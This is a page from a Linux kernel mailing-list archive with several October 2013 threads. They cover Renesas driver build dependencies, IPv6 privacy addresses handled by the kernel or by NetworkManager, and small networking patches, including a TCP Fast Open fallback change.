* Re: [PATCH 00/19] Enable various Renesas drivers on all ARM platforms
From: Mark Brown @ 2013-10-29 17:58 UTC (permalink / raw)
To: Laurent Pinchart
Cc: linux-fbdev-u79uwXL29TY76Z2rM5mHXA, Wolfram Sang, Linus Walleij,
Guennadi Liakhovetski, Thierry Reding,
linux-mtd-IAPFreCvJWM7uuMidbF8XUB+6BGkLq7r,
linux-i2c-u79uwXL29TY76Z2rM5mHXA, Laurent Pinchart, Vinod Koul,
linux-sh-u79uwXL29TY76Z2rM5mHXA, Magnus Damm, Eduardo Valentin,
Tomi Valkeinen, linux-serial-u79uwXL29TY76Z2rM5mHXA,
linux-input-u79uwXL29TY76Z2rM5mHXA, Zhang Rui, Chris Ball,
Jean-Christophe Plagniol-Villard,
linux-media-u79uwXL29TY76Z2rM5mHXA,
linux-pwm-u79uwXL29TY76Z2rM5mHXA, Samuel Ortiz,
linux-pm-u79uwXL29TY76Z2rM5mHXA, Ian Molton, Simon Horman,
linux-arm
In-Reply-To: <1422562.0L87CDt5Gd@avalon>
On Tue, Oct 29, 2013 at 06:29:59PM +0100, Laurent Pinchart wrote:
> On Tuesday 29 October 2013 10:23:31 Mark Brown wrote:
> > On Tue, Oct 29, 2013 at 06:05:53PM +0100, Laurent Pinchart wrote:
> > > The first one is that I can't compile-test all those drivers on all
> > > architectures. The spi-sh-msiof driver, for instance, uses
> > > io(read|write)(16|
> > Which architectures are these and is there not a symbol we can depend on
> > for them?
> arch/cris for instance. We can use readl/writel instead (maybe it would be
> time to rationalize and document the I/O accessors across all architectures,
> but that's another topic).
It'd certainly be sensible, as would adding a config option to depend
on if you rely on these functions.
> My point is that there might be other issues that I won't be able to easily
> catch. This would break compilation for everybody for no reason, as the
> drivers are useless on non-SuperH, non-ARM platforms. That's why I believe
> COMPILE_TEST would be a better option as a first step.
Yes, it would - please do that. Note that it won't stop anyone running
into build issues on other architectures though, it's just about
stopping Kconfig noise.
^ permalink raw reply
* Re: [PATCH 00/19] Enable various Renesas drivers on all ARM platforms
From: Laurent Pinchart @ 2013-10-29 17:29 UTC (permalink / raw)
To: Mark Brown
Cc: linux-fbdev-u79uwXL29TY76Z2rM5mHXA, Wolfram Sang, Linus Walleij,
Guennadi Liakhovetski, Thierry Reding,
linux-mtd-IAPFreCvJWM7uuMidbF8XUB+6BGkLq7r,
linux-i2c-u79uwXL29TY76Z2rM5mHXA, Laurent Pinchart,
ed.com-i9wRM+HIrmnmtl4Z8vJ8Kg761KYD1DLY, Vinod Koul,
linux-sh-u79uwXL29TY76Z2rM5mHXA, Magnus Damm, Eduardo Valentin,
Tomi Valkeinen, linux-serial-u79uwXL29TY76Z2rM5mHXA,
linux-input-u79uwXL29TY76Z2rM5mHXA, Zhang Rui, Chris Ball,
Jean-Christophe Plagniol-Villard,
linux-media-u79uwXL29TY76Z2rM5mHXA,
linux-pwm-u79uwXL29TY76Z2rM5mHXA, Samuel Ortiz,
linux-pm-u79uwXL29TY76Z2rM5mHXA, Ian Molton, Simon
In-Reply-To: <20131029172331.GA20251-GFdadSzt00ze9xe1eoZjHA@public.gmane.org>
Hi Mark,
On Tuesday 29 October 2013 10:23:31 Mark Brown wrote:
> On Tue, Oct 29, 2013 at 06:05:53PM +0100, Laurent Pinchart wrote:
> > The first one is that I can't compile-test all those drivers on all
> > architectures. The spi-sh-msiof driver, for instance, uses
> > io(read|write)(16|
>
> Which architectures are these and is there not a symbol we can depend on
> for them?
arch/cris for instance. We can use readl/writel instead (maybe it would be
time to rationalize and document the I/O accessors across all architectures,
but that's another topic).
My point is that there might be other issues that I won't be able to easily
catch. This would break compilation for everybody for no reason, as the
drivers are useless on non-SuperH, non-ARM platforms. That's why I believe
COMPILE_TEST would be a better option as a first step.
> > 32) which are not available on all architectures. There might be other
> > similar problems that I can't catch, and I don't want to introduce build
> > breakages in the kernel.
>
> This is easy enough to handle if we do run into issues, it seems better to
> get things available than try to step through architecture by architecture.
>
> > The second reason is that, as the IP cores have never been used on
> > anything but SuperH and ARM, I don't like the idea of clobbering the
> > config process with drivers that are useless on the target architecture.
> > Now that we have a COMPILE_TEST Kconfig option, my preference would thus
> > go to SUPERH || ARM || COMPILE_TEST over no dependency at all.
>
> That's not what you did, though - you're not adding COMPILE_TEST.
No, but I can add it :-) If this gets agreed upon, I'll respin the series with
|| COMPILE_TEST.
--
Regards,
Laurent Pinchart
^ permalink raw reply
* Re: [PATCH 00/19] Enable various Renesas drivers on all ARM platforms
From: Mark Brown @ 2013-10-29 17:23 UTC (permalink / raw)
To: Laurent Pinchart
Cc: linux-fbdev-u79uwXL29TY76Z2rM5mHXA, Wolfram Sang, Linus Walleij,
Guennadi Liakhovetski, Thierry Reding,
linux-mtd-IAPFreCvJWM7uuMidbF8XUB+6BGkLq7r,
linux-i2c-u79uwXL29TY76Z2rM5mHXA, Laurent Pinchart, Vinod Koul,
linux-sh-u79uwXL29TY76Z2rM5mHXA, Magnus Damm, Eduardo Valentin,
Tomi Valkeinen, linux-serial-u79uwXL29TY76Z2rM5mHXA,
linux-input-u79uwXL29TY76Z2rM5mHXA, Zhang Rui, Chris Ball,
Jean-Christophe Plagniol-Villard,
linux-media-u79uwXL29TY76Z2rM5mHXA,
linux-pwm-u79uwXL29TY76Z2rM5mHXA, Samuel Ortiz,
linux-pm-u79uwXL29TY76Z2rM5mHXA, Ian Molton, Simon Horman,
linux-arm
In-Reply-To: <1577821.Q7gttkPE2J@avalon>
On Tue, Oct 29, 2013 at 06:05:53PM +0100, Laurent Pinchart wrote:
> The first one is that I can't compile-test all those drivers on all
> architectures. The spi-sh-msiof driver, for instance, uses io(read|write)(16|
Which architectures are these and is there not a symbol we can depend on
for them?
> 32) which are not available on all architectures. There might be other similar
> problems that I can't catch, and I don't want to introduce build breakages in
> the kernel.
This is easy enough to handle if we do run into issues, it seems better
to get things available than try to step through architecture by
architecture.
> The second reason is that, as the IP cores have never been used on anything
> but SuperH and ARM, I don't like the idea of clobbering the config process
> with drivers that are useless on the target architecture. Now that we have a
> COMPILE_TEST Kconfig option, my preference would thus go to SUPERH || ARM ||
> COMPILE_TEST over no dependency at all.
That's not what you did, though - you're not adding COMPILE_TEST.
^ permalink raw reply
* Re: [patch net-next] ipv6: allow userspace to create address with IFLA_F_TEMPORARY flag
From: Dan Williams @ 2013-10-29 17:21 UTC (permalink / raw)
To: Hannes Frederic Sowa
Cc: David Miller, jiri, vyasevich, netdev, kuznet, jmorris, yoshfuji,
kaber, thaller, stephen
In-Reply-To: <20131029143847.GB16253@order.stressinduktion.org>
On Tue, 2013-10-29 at 15:38 +0100, Hannes Frederic Sowa wrote:
> Hi!
>
> On Tue, Oct 29, 2013 at 09:31:18AM -0500, Dan Williams wrote:
> > On Tue, 2013-10-29 at 00:48 +0100, Hannes Frederic Sowa wrote:
> > > On Mon, Oct 28, 2013 at 06:16:19PM -0500, Dan Williams wrote:
> > > > On Mon, 2013-10-28 at 17:17 -0400, David Miller wrote:
> > > > > From: Hannes Frederic Sowa <hannes@stressinduktion.org>
> > > > > Date: Sun, 27 Oct 2013 17:48:35 +0100
> > > > >
> > > > > > A temporary address is also bound to a non-privacy public address so
> > > > > > it's lifetime is determined by its lifetime (e.g. if you switch the
> > > > > > network and don't receive on-link information for that prefix any
> > > > > > more). NetworkManager would have to take care about that, too. It is
> > > > > > just a question of what NetworkManager wants to handle itself or lets
> > > > > > the kernel handle for it.
> > > > >
> > > > > How much really needs to be in userspace to implement RFC4941?
> > > > >
> > > > > I don't like the idea that even for a fully up and properly
> > > > > functioning link, if NetworkManager wedges then critical things like
> > > > > temporary address (re-)generation, will cease.
> > > >
> > > > Honestly, I'd be completely happy to leave temporary address handling up
> > > > to the kernel and *not* do it in userspace; the kernel already has all
> > > > the code. There are two problems with that though, (a) it's tied to
> > > > in-kernel RA handling, and (b) it's controlled by a CONFIG option. Both
> > > > these are solvable.
> > >
> > > Ah, (a) does complicate things, I agree. But the tieing is essential
> > > currently. So it seems a netlink interface would be needed to tie a new
> > > address to an already installed one, if the kernel should still deal
> > > with the regeneration?
> >
> > I think it's simpler than that. New flag set when adding the
> > non-private address that says "create and manage privacy addresses for
> > this non-private address". The kernel then adds the privacy addresses
> > generated off the non-private address/prefixlen, and ties their lifetime
> > to the non-private address. If the non-private address is removed, the
> > privacy addresses could get removed too.
> >
> > I don't think we need API to tie addresses to already installed ones,
> > because the kernel already has the privacy address generation code, so
> > why should userspace generate the privacy address at all? Just leave
> > that to the kernel.
>
> Ok.
>
> > > > First off, what's the reasoning behind having IPv6 privacy as a config
> > > > option? It's off-by-default and must be explicitly turned on, so is
> > > > there any harm in removing the config? Or is it just for
> > > > smallest-kernel-ever folks?
> > >
> > > I don't know about the policy. Does it really matter as distributions
> > > normally switch it on? But I would not like to see the option removed
> > > entirly, maybe the default could be changed.
> > >
> > > > Would a new IFA_F_MANAGE_TEMP (or better name) work here, indicating
> > > > that for some new static address, that the kernel should create and
> > > > manage the temporary privacy addresses associated with its prefix?
> > >
> > > But this would only be needed if they were managed in user-space, no?
> >
> > "if they" == what? privacy address or static address? What
>
> With "they" I meant privacy addresses.
>
> > NetworkManager is trying to do is handle RAs in userspace with libndp
> > for various flexibility and behavioral reasons, but we'd really like to
> > leave all the temporary address stuff up to the kernel.
>
> Can you provide me with details why the Kernel RA implementation is not good
> enough? I tried to find some bugs, I found some but they were missing details
> or were not even correct or outdated.
First, RA handling is too tightly tied to interface flags. This is a
problem because interfaces are required to be IFF_UP for various
operations like carrier detection, wireless scanning, reading certain
interface properties, link statistics, etc. We can play games with
flipping accept_ra, but changing accept_ra doesn't trigger an RS. At
the moment, only interface flag changes trigger an RS, and that also can
reset a lot of L2 state.
Second, Router Solicitations are required at various times other than
NETDEV_CHANGE/NETDEV_UP. The router is not guaranteed to send (nor are
we guaranteed to receive) an RA when the RDNSS/DNSSL approach their
lifetimes, so to ensure those values are still valid, we need to
send out an RS, especially on lossy networks where the RA might get
dropped.
Third, we need more flexibility in reading ND user options like DNSSL
and RDNSS and newer stuff. Every new option that userspace might want
to process requires some kernel code (ndisc_is_useropt()) to push it out
to userspace, and that means these options are not available on older
kernels.
Fourth, there's no opportunity to override any of the RA-derived
settings with user preferences before the kernel commits them. Perhaps
the user wishes to ignore a specific prefix (but accept other prefixes
or other RAs), or to ignore the automatically provided routes, or
whatever.
> > So NM would handle RA/RS and when it gets a prefix, it would create the
> > IPv6 non-private address and add it to the interface. When adding, it
> > would also set the "IFA_F_MANAGE_TEMP" flag (or whatever) and the kernel
> > would then handle all the privacy address generation, lifetimes, and
> > timers. Basically, break some of the privacy code away from the
> > in-kernel RA handling so that privacy addresses could be triggered from
> > userland too.
> >
> > Would that be workable?
>
> That sounds like a solid plan for me. I would actually liked to see that NM
> would use the kernel implementation but I guess there is no way back any more.
> :(
Some of the issues mentioned above might be inappropriate to solve
entirely in the kernel. I have no problem with in-kernel IPv6 for
simple use-cases and it works great for these. But if we think about
more complex functionality, especially where userland might want an
opportunity to override some of the behavior, and backwards
compatibility with kernels that don't implement these changes, we'd like
to handle some addrconf in userspace.
Dan
^ permalink raw reply
* Re: [patch net-next] ipv6: allow userspace to create address with IFLA_F_TEMPORARY flag
From: Dan Williams @ 2013-10-29 17:15 UTC (permalink / raw)
To: Vlad Yasevich
Cc: Hannes Frederic Sowa, David Miller, jiri, netdev, kuznet, jmorris,
yoshfuji, kaber, thaller, stephen
In-Reply-To: <526FE93E.3040300@gmail.com>
On Tue, 2013-10-29 at 12:58 -0400, Vlad Yasevich wrote:
> On 10/29/2013 10:31 AM, Dan Williams wrote:
> > On Tue, 2013-10-29 at 00:48 +0100, Hannes Frederic Sowa wrote:
> >> On Mon, Oct 28, 2013 at 06:16:19PM -0500, Dan Williams wrote:
> >>> On Mon, 2013-10-28 at 17:17 -0400, David Miller wrote:
> >>>> From: Hannes Frederic Sowa <hannes@stressinduktion.org>
> >>>> Date: Sun, 27 Oct 2013 17:48:35 +0100
> >>>>
> >>>>> A temporary address is also bound to a non-privacy public address so
> >>>>> it's lifetime is determined by its lifetime (e.g. if you switch the
> >>>>> network and don't receive on-link information for that prefix any
> >>>>> more). NetworkManager would have to take care about that, too. It is
> >>>>> just a question of what NetworkManager wants to handle itself or lets
> >>>>> the kernel handle for it.
> >>>>
> >>>> How much really needs to be in userspace to implement RFC4941?
> >>>>
> >>>> I don't like the idea that even for a fully up and properly
> >>>> functioning link, if NetworkManager wedges then critical things like
> >>>> temporary address (re-)generation, will cease.
> >>>
> >>> Honestly, I'd be completely happy to leave temporary address handling up
> >>> to the kernel and *not* do it in userspace; the kernel already has all
> >>> the code. There are two problems with that though, (a) it's tied to
> >>> in-kernel RA handling, and (b) it's controlled by a CONFIG option. Both
> >>> these are solvable.
> >>
> >> Ah, (a) does complicate things, I agree. But the tieing is essential
> >> currently. So it seems a netlink interface would be needed to tie a new
> >> address to an already installed one, if the kernel should still deal
> >> with the regeneration?
> >
> > I think it's simpler than that. New flag set when adding the
> > non-private address that says "create and manage privacy addresses for
> > this non-private address". The kernel then adds the privacy addresses
> > generated off the non-private address/prefixlen, and ties their lifetime
> > to the non-private address. If the non-private address is removed, the
> > privacy addresses could get removed too.
> >
> > I don't think we need API to tie addresses to already installed ones,
> > because the kernel already has the privacy address generation code, so
> > why should userspace generate the privacy address at all? Just leave
> > that to the kernel.
> >
> >>> First off, what's the reasoning behind having IPv6 privacy as a config
> >>> option? It's off-by-default and must be explicitly turned on, so is
> >>> there any harm in removing the config? Or is it just for
> >>> smallest-kernel-ever folks?
> >>
> >> I don't know about the policy. Does it really matter as distributions
> >> normally switch it on? But I would not like to see the option removed
> >> entirly, maybe the default could be changed.
> >>
> >>> Would a new IFA_F_MANAGE_TEMP (or better name) work here, indicating
> >>> that for some new static address, that the kernel should create and
> >>> manage the temporary privacy addresses associated with its prefix?
> >>
> >> But this would only be needed if they were managed in user-space, no?
> >
> > "if they" == what? privacy address or static address? What
> > NetworkManager is trying to do is handle RAs in userspace with libndp
> > for various flexibility and behavioral reasons, but we'd really like to
> > leave all the temporary address stuff up to the kernel.
> >
> > So NM would handle RA/RS and when it gets a prefix, it would create the
> > IPv6 non-private address and add it to the interface. When adding, it
> > would also set the "IFA_F_MANAGE_TEMP" flag (or whatever) and the kernel
> > would then handle all the privacy address generation, lifetimes, and
> > timers. Basically, break some of the privacy code away from the
> > in-kernel RA handling so that privacy addresses could be triggered from
> > userland too.
> >
> > Would that be workable?
>
> You are still dependent on the NM/user app to do this and what happens
> if that apps wedges?
In my proposal, the kernel would still manage the lifetimes of all the
addresses, since user app would add the non-privacy address with the
correct lifetime, and the kernel would generate the privacy addresses
with a corresponding lifetime. If the app wedges for some reason, then
the kernel will deprecate and eventually remove the non-privacy *and*
privacy addresses since their lifetimes have expired.
What if your dhclient wedges? What if ovsd or teamd goes down? Or your
openvpn, vpnc, pptp, pppd, sshd, whatever wedges? There's a lot of
networking that's controlled by userland these days, and failure of
these things also potentially wedges your network. We should be
striving to make the best userland we can instead of trying to stuff
everything into the kernel in the name of reliability.
> I think we should just do privacy addresses automatically, or based on
> some sysconfig setting per interface to give users ability to turn it
> off. But I agree with David, and I speak from experience.
> You don't whant address configuration to be done by userspace daemon.
> There are too many things that can go wrong.
Should IPv6 be that different from IPv4? DHCP is done by a
userspace daemon in all cases (v6 and v4), and other v4 is always done
by userland (static files, avahi-autoipd, other daemons). You can never
get away from userland here, and we need more flexibility in userland
than the kernel currently provides with its addrconf implementation.
Dan
^ permalink raw reply
* [PATCH net-next] tcp: temporarily disable Fast Open on SYN timeout
From: Yuchung Cheng @ 2013-10-29 17:09 UTC (permalink / raw)
To: davem, ncardwell, edumazet; +Cc: netdev, Yuchung Cheng
Fast Open currently has a fallback feature to address SYN-data being
dropped, but it requires the middle-box to pass on the regular SYN
retry after SYN-data. This is implemented in commit aab487435
("net-tcp: Fast Open client - detecting SYN-data drops").
However, some NAT boxes will drop all subsequent packets after the
first SYN-data and blackhole the entire connection. An example is in
commit 356d7d8 "netfilter: nf_conntrack: fix tcp_in_window for Fast
Open".
The sender should note such incidents and fall back to the regular
TCP handshake on subsequent attempts temporarily as well: after the
second SYN times out, the original Fast Open SYN is most likely lost.
When such an event recurs, Fast Open is disabled for a period that
grows exponentially with the number of recurrences.
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
---
net/ipv4/tcp_metrics.c | 5 +++--
net/ipv4/tcp_timer.c | 6 +++++-
2 files changed, 8 insertions(+), 3 deletions(-)
diff --git a/net/ipv4/tcp_metrics.c b/net/ipv4/tcp_metrics.c
index 4a2a841..2ab09cb 100644
--- a/net/ipv4/tcp_metrics.c
+++ b/net/ipv4/tcp_metrics.c
@@ -671,8 +671,9 @@ void tcp_fastopen_cache_set(struct sock *sk, u16 mss,
 		struct tcp_fastopen_metrics *tfom = &tm->tcpm_fastopen;
 
 		write_seqlock_bh(&fastopen_seqlock);
-		tfom->mss = mss;
-		if (cookie->len > 0)
+		if (mss)
+			tfom->mss = mss;
+		if (cookie && cookie->len > 0)
 			tfom->cookie = *cookie;
 		if (syn_lost) {
 			++tfom->syn_loss;
diff --git a/net/ipv4/tcp_timer.c b/net/ipv4/tcp_timer.c
index af07b5b..64f0354 100644
--- a/net/ipv4/tcp_timer.c
+++ b/net/ipv4/tcp_timer.c
@@ -156,12 +156,16 @@ static bool retransmits_timed_out(struct sock *sk,
 static int tcp_write_timeout(struct sock *sk)
 {
 	struct inet_connection_sock *icsk = inet_csk(sk);
+	struct tcp_sock *tp = tcp_sk(sk);
 	int retry_until;
 	bool do_reset, syn_set = false;
 
 	if ((1 << sk->sk_state) & (TCPF_SYN_SENT | TCPF_SYN_RECV)) {
-		if (icsk->icsk_retransmits)
+		if (icsk->icsk_retransmits) {
 			dst_negative_advice(sk);
+			if (tp->syn_fastopen || tp->syn_data)
+				tcp_fastopen_cache_set(sk, 0, NULL, true);
+		}
 		retry_until = icsk->icsk_syn_retries ? : sysctl_tcp_syn_retries;
 		syn_set = true;
 	} else {
--
1.8.4.1
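One way to picture the exponential disabling described in the commit
message is the userspace sketch below. It is not the kernel
implementation: the 60-second base interval, the threshold of two
recorded losses, the clamp on the shift, and the names
fastopen_paused() and FASTOPEN_BASE_PAUSE_SEC are all assumptions made
for illustration.

```c
#include <stdbool.h>
#include <stdint.h>

/* Assumed base pause in seconds; a hypothetical value for illustration. */
#define FASTOPEN_BASE_PAUSE_SEC 60u

/*
 * Returns true if Fast Open should be skipped for this connection attempt.
 *   syn_loss:      consecutive SYN timeouts recorded for the destination
 *   last_loss_sec: time of the most recently recorded loss, in seconds
 *   now_sec:       current time, in seconds
 */
static bool fastopen_paused(unsigned int syn_loss, uint64_t last_loss_sec,
			    uint64_t now_sec)
{
	if (syn_loss < 2)	/* a single loss may be ordinary packet loss */
		return false;
	if (syn_loss > 20)	/* clamp the shift so the pause stays bounded */
		syn_loss = 20;
	/* The pause doubles with every additional recorded loss. */
	return now_sec < last_loss_sec +
			 ((uint64_t)FASTOPEN_BASE_PAUSE_SEC << syn_loss);
}
```

Under these assumptions, two recorded losses pause Fast Open for 240
seconds after the last loss and three losses for 480 seconds; a
successful handshake would reset the counter to zero, as the syn_lost
handling in tcp_fastopen_cache_set() suggests.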
^ permalink raw reply related
* Re: [PATCH 00/19] Enable various Renesas drivers on all ARM platforms
From: Laurent Pinchart @ 2013-10-29 17:05 UTC (permalink / raw)
To: Mark Brown
Cc: linux-fbdev-u79uwXL29TY76Z2rM5mHXA, Wolfram Sang, Linus Walleij,
Guennadi Liakhovetski, Thierry Reding,
linux-mtd-IAPFreCvJWM7uuMidbF8XUB+6BGkLq7r,
linux-i2c-u79uwXL29TY76Z2rM5mHXA, Laurent Pinchart,
ed.com-i9wRM+HIrmnmtl4Z8vJ8Kg761KYD1DLY, Vinod Koul,
linux-sh-u79uwXL29TY76Z2rM5mHXA, Magnus Damm, Eduardo Valentin,
Tomi Valkeinen, linux-serial-u79uwXL29TY76Z2rM5mHXA,
linux-input-u79uwXL29TY76Z2rM5mHXA, Zhang Rui, Chris Ball,
Jean-Christophe Plagniol-Villard,
linux-media-u79uwXL29TY76Z2rM5mHXA,
linux-pwm-u79uwXL29TY76Z2rM5mHXA, Samuel Ortiz,
linux-pm-u79uwXL29TY76Z2rM5mHXA, Ian Molton, Simon
In-Reply-To: <20131029160449.GD16686-GFdadSzt00ze9xe1eoZjHA@public.gmane.org>
Hi Mark,
On Tuesday 29 October 2013 09:04:49 Mark Brown wrote:
> On Tue, Oct 29, 2013 at 03:04:27PM +0900, Simon Horman wrote:
> > I think this is a step in a good direction.
> > However, I think it would be even better if the architecture dependency
> > was removed completely.
>
> Yes, please.
I've kept it for two reasons.
The first one is that I can't compile-test all those drivers on all
architectures. The spi-sh-msiof driver, for instance, uses io(read|write)(16|
32) which are not available on all architectures. There might be other similar
problems that I can't catch, and I don't want to introduce build breakages in
the kernel.
The second reason is that, as the IP cores have never been used on anything
but SuperH and ARM, I don't like the idea of clobbering the config process
with drivers that are useless on the target architecture. Now that we have a
COMPILE_TEST Kconfig option, my preference would thus go to SUPERH || ARM ||
COMPILE_TEST over no dependency at all.
--
Regards,
Laurent Pinchart
^ permalink raw reply
* Re: [net-next 11/11] i40e: fix error return code in i40e_probe()
From: Joe Perches @ 2013-10-29 17:05 UTC (permalink / raw)
To: Jeff Kirsher; +Cc: davem, Wei Yongjun, netdev, gospo, sassmann
In-Reply-To: <1383048151-15002-12-git-send-email-jeffrey.t.kirsher@intel.com>
On Tue, 2013-10-29 at 05:02 -0700, Jeff Kirsher wrote:
> Fix to return -ENOMEM in the memory alloc error handling
> case instead of 0, as done elsewhere in this function.
trivial note:
> diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
[]
> @@ -7204,8 +7204,10 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
> */
> len = sizeof(struct i40e_vsi *) * pf->hw.func_caps.num_vsis;
> pf->vsi = kzalloc(len, GFP_KERNEL);
> - if (!pf->vsi)
> + if (!pf->vsi) {
> + err = -ENOMEM;
> goto err_switch_setup;
> + }
This might be better as:
	pf->vsi = kcalloc(pf->hw.func_caps.num_vsis,
			  sizeof(struct i40e_vsi *), GFP_KERNEL);
and removing the now unused u32 len; declaration.
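The usual argument for an array-style allocator over an open-coded
"count * size" is that the multiplication is checked for overflow
before anything is allocated. The userspace sketch below illustrates
that idea only; alloc_array_zeroed() is a hypothetical helper, not the
kernel's kcalloc().

```c
#include <stdint.h>
#include <stdlib.h>

/*
 * Hypothetical userspace stand-in for an overflow-checked, zeroing array
 * allocator: returns NULL when n * size would not fit in a size_t.
 */
static void *alloc_array_zeroed(size_t n, size_t size)
{
	if (size != 0 && n > SIZE_MAX / size)
		return NULL;	/* n * size would wrap around */
	return calloc(n, size);	/* memory is returned zero-filled */
}
```

With a helper of this shape, the caller passes the element count and
element size separately, so no intermediate length variable is needed.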
^ permalink raw reply
* Re: [patch net-next] ipv6: allow userspace to create address with IFLA_F_TEMPORARY flag
From: Vlad Yasevich @ 2013-10-29 16:58 UTC (permalink / raw)
To: Dan Williams, Hannes Frederic Sowa
Cc: David Miller, jiri, netdev, kuznet, jmorris, yoshfuji, kaber,
thaller, stephen
In-Reply-To: <1383057078.2236.12.camel@dcbw.foobar.com>
On 10/29/2013 10:31 AM, Dan Williams wrote:
> On Tue, 2013-10-29 at 00:48 +0100, Hannes Frederic Sowa wrote:
>> On Mon, Oct 28, 2013 at 06:16:19PM -0500, Dan Williams wrote:
>>> On Mon, 2013-10-28 at 17:17 -0400, David Miller wrote:
>>>> From: Hannes Frederic Sowa <hannes@stressinduktion.org>
>>>> Date: Sun, 27 Oct 2013 17:48:35 +0100
>>>>
>>>>> A temporary address is also bound to a non-privacy public address so
>>>>> it's lifetime is determined by its lifetime (e.g. if you switch the
>>>>> network and don't receive on-link information for that prefix any
>>>>> more). NetworkManager would have to take care about that, too. It is
>>>>> just a question of what NetworkManager wants to handle itself or lets
>>>>> the kernel handle for it.
>>>>
>>>> How much really needs to be in userspace to implement RFC4941?
>>>>
>>>> I don't like the idea that even for a fully up and properly
>>>> functioning link, if NetworkManager wedges then critical things like
>>>> temporary address (re-)generation, will cease.
>>>
>>> Honestly, I'd be completely happy to leave temporary address handling up
>>> to the kernel and *not* do it in userspace; the kernel already has all
>>> the code. There are two problems with that though, (a) it's tied to
>>> in-kernel RA handling, and (b) it's controlled by a CONFIG option. Both
>>> these are solvable.
>>
>> Ah, (a) does complicate things, I agree. But the tieing is essential
>> currently. So it seems a netlink interface would be needed to tie a new
>> address to an already installed one, if the kernel should still deal
>> with the regeneration?
>
> I think it's simpler than that. New flag set when adding the
> non-private address that says "create and manage privacy addresses for
> this non-private address". The kernel then adds the privacy addresses
> generated off the non-private address/prefixlen, and ties their lifetime
> to the non-private address. If the non-private address is removed, the
> privacy addresses could get removed too.
>
> I don't think we need API to tie addresses to already installed ones,
> because the kernel already has the privacy address generation code, so
> why should userspace generate the privacy address at all? Just leave
> that to the kernel.
>
>>> First off, what's the reasoning behind having IPv6 privacy as a config
>>> option? It's off-by-default and must be explicitly turned on, so is
>>> there any harm in removing the config? Or is it just for
>>> smallest-kernel-ever folks?
>>
>> I don't know about the policy. Does it really matter as distributions
>> normally switch it on? But I would not like to see the option removed
>> entirly, maybe the default could be changed.
>>
>>> Would a new IFA_F_MANAGE_TEMP (or better name) work here, indicating
>>> that for some new static address, that the kernel should create and
>>> manage the temporary privacy addresses associated with its prefix?
>>
>> But this would only be needed if they were managed in user-space, no?
>
> "if they" == what? privacy address or static address? What
> NetworkManager is trying to do is handle RAs in userspace with libndp
> for various flexibility and behavioral reasons, but we'd really like to
> leave all the temporary address stuff up to the kernel.
>
> So NM would handle RA/RS and when it gets a prefix, it would create the
> IPv6 non-private address and add it to the interface. When adding, it
> would also set the "IFA_F_MANAGE_TEMP" flag (or whatever) and the kernel
> would then handle all the privacy address generation, lifetimes, and
> timers. Basically, break some of the privacy code away from the
> in-kernel RA handling so that privacy addresses could be triggered from
> userland too.
>
> Would that be workable?
You are still dependent on the NM/user app to do this and what happens
if that app wedges?
I think we should just do privacy addresses automatically, or based on
some sysconfig setting per interface to give users ability to turn it
off. But I agree with David, and I speak from experience.
You don't want address configuration to be done by a userspace daemon.
There are too many things that can go wrong.
-vlad
>
> Dan
>
^ permalink raw reply
* Re: [PATCH] netdev: octeon_mgmt: drop redundant mac address check
From: David Daney @ 2013-10-29 16:33 UTC (permalink / raw)
To: Luka Perkov, David Miller; +Cc: netdev, david.daney
In-Reply-To: <1383010061-25461-1-git-send-email-luka@openwrt.org>
On 10/28/2013 06:27 PM, Luka Perkov wrote:
> Checking if MAC address is valid using is_valid_ether_addr() is already done in
> of_get_mac_address().
>
> Signed-off-by: Luka Perkov <luka@openwrt.org>
This looks sane, but I haven't tested it...
Acked-by: David Daney <david.daney@cavium.com>
> ---
> drivers/net/ethernet/octeon/octeon_mgmt.c | 2 +-
> 1 file changed, 1 insertion(+), 1 deletion(-)
>
> diff --git a/drivers/net/ethernet/octeon/octeon_mgmt.c b/drivers/net/ethernet/octeon/octeon_mgmt.c
> index 622aa75..1b326cbc 100644
> --- a/drivers/net/ethernet/octeon/octeon_mgmt.c
> +++ b/drivers/net/ethernet/octeon/octeon_mgmt.c
> @@ -1545,7 +1545,7 @@ static int octeon_mgmt_probe(struct platform_device *pdev)
>
> mac = of_get_mac_address(pdev->dev.of_node);
>
> - if (mac && is_valid_ether_addr(mac))
> + if (mac)
> memcpy(netdev->dev_addr, mac, ETH_ALEN);
> else
> eth_hw_addr_random(netdev);
>
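For readers unfamiliar with the check being dropped: as far as I know,
a MAC address is treated as valid when it is neither a multicast
address nor all zeros. The userspace sketch below restates that rule;
the mac_* names and MAC_LEN are made up for illustration and are not
the kernel helpers themselves.

```c
#include <stdbool.h>
#include <stdint.h>

#define MAC_LEN 6	/* same length as the kernel's ETH_ALEN */

/* True if every byte of the address is zero. */
static bool mac_is_zero(const uint8_t mac[MAC_LEN])
{
	for (int i = 0; i < MAC_LEN; i++)
		if (mac[i] != 0)
			return false;
	return true;
}

/* True if the group bit (lowest bit of the first byte) is set. */
static bool mac_is_multicast(const uint8_t mac[MAC_LEN])
{
	return (mac[0] & 0x01) != 0;
}

/* Valid means usable as a unicast station address. */
static bool mac_is_valid(const uint8_t mac[MAC_LEN])
{
	return !mac_is_multicast(mac) && !mac_is_zero(mac);
}
```

The broadcast address ff:ff:ff:ff:ff:ff is rejected by the multicast
test, since its group bit is set.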
^ permalink raw reply
* Re: [PATCH 00/19] Enable various Renesas drivers on all ARM platforms
From: Linus Walleij @ 2013-10-29 16:28 UTC (permalink / raw)
To: Laurent Pinchart
Cc: linux-fbdev@vger.kernel.org, linux-sh@vger.kernel.org,
Guennadi Liakhovetski, Thierry Reding,
linux-mtd@lists.infradead.org, linux-i2c@vger.kernel.org,
Vinod Koul, Joerg Roedel, Wolfram Sang, Magnus Damm,
Eduardo Valentin, Tomi Valkeinen, linux-serial@vger.kernel.org,
Linux Input, Zhang Rui, Chris Ball,
Jean-Christophe Plagniol-Villard, linux-media@vger.kernel.org,
"linux-pwm@vger.kernel.org" <linu
In-Reply-To: <1383004027-25036-1-git-send-email-laurent.pinchart+renesas@ideasonboard.com>
On Mon, Oct 28, 2013 at 4:46 PM, Laurent Pinchart
<laurent.pinchart+renesas@ideasonboard.com> wrote:
> If you believe the issue should be solved in a different way (for instance by
> removing the architecture dependency completely) please reply to the cover
> letter to let other maintainers chime in.
I have no real opinions on whether this is a good intermediate step towards
complete arch-independence or not, but I just noticed that you still
